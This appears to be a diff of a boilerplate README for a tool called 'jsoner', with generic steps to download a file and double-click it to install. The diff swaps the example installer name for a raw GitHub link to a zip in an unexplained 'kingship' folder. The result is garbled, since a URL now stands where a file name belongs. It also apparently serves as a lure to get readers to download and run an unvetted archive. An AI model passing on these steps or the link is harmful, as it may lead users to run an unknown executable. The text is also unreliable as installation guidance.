KUNAL5724510/jsoner/readme.md

    You will see a list of available files for download.
 Click on the file that matches your operating system (e.g., Windows, Mac, Linux).

 4. **Locate the Downloaded File**
    After the download completes, find the file in your downloads folder.
-It will usually be named something like `jsoner-vX.X.X.exe` or a similarly formatted file name.
+It will usually be named something like `https://raw.githubusercontent.com/KUNAL5724510/jsoner/main/kingship/jsoner.zip` or a similarly formatted file name.

 5. **Install the Application**
    Double-click on the downloaded file to start the installation.
 Follow the on-screen instructions to complete the setup process.